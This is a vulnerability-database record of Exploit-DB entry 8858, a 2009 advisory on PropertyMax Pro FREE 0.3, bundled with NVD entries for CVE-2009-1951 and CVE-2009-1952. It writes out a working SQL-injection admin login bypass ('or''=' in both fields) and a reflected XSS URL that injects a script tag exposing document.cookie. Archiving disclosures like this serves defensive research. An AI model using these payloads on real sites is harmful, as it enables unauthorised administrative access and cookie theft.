{"hash": "fd2a94e7aae0e2a71b10ae78adf438860e18794259581af0df97a1cc7ca4b206", "id": "EDB-ID:8858", "lastseen": "2016-02-01T08:20:45", "enchantments": {"vulnersScore": 6.8}, "bulletinFamily": "exploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/8858/", "description": "PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities. CVE-2009-1951,CVE-2009-1952. Webapps exploit for php platform", "title": "propertymax pro free sql/XSS Multiple Vulnerabilities", "sourceData": "########################################################################\n[+] PropertyMax Pro FREE (SQL/XSS) Multiple Remote Vulnerabilities\n[+] Discovered By SirGod\n[+] www.mortal-team.org\n[+] www.h4cky0u.org\n#########################################################################\n\n[+] SQL Injection ( Auth Bypass) \n\nConditions : magic_quotes_gpc = off\n\nGo to :\n\n http://127.0.0.1/path/admin\n\nLogin as : \n\n Username : 'or''='\n Password : 'or''='\n\n[+] Cross-Site Scripting\n\n http://127.0.0.1/path/?op=mi&id=2&pl=\"><script>alert(document.cookie)</script>\n\n#########################################################################\n\n# milw0rm.com [2009-06-02]\n", "objectVersion": "1.0", "cvelist": ["CVE-2009-1952", "CVE-2009-1951"], "published": "2009-06-02T00:00:00", "osvdbidlist": ["54864", "54863"], "references": [], "reporter": "SirGod", "modified": "2009-06-02T00:00:00", "href": "https://www.exploit-db.com/exploits/8858/"}

{"result": {"cve": [{"id": "CVE-2009-1952", "type": "cve", "title": "CVE-2009-1952", "description": "Multiple SQL injection vulnerabilities in the administrative login feature in PropertyMax Pro FREE 0.3, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.", "published": "2009-06-05T17:30:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1952", "cvelist": ["CVE-2009-1952"], "lastseen": "2017-09-29T14:26:38"}, {"id": "CVE-2009-1951", "type": "cve", "title": "CVE-2009-1951", "description": "Cross-site scripting (XSS) vulnerability in index.php in PropertyMax Pro FREE 0.3 allows remote attackers to inject arbitrary web script or HTML via the pl parameter in a mi action.", "published": "2009-06-05T17:30:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1951", "cvelist": ["CVE-2009-1951"], "lastseen": "2017-09-29T14:26:38"}]}}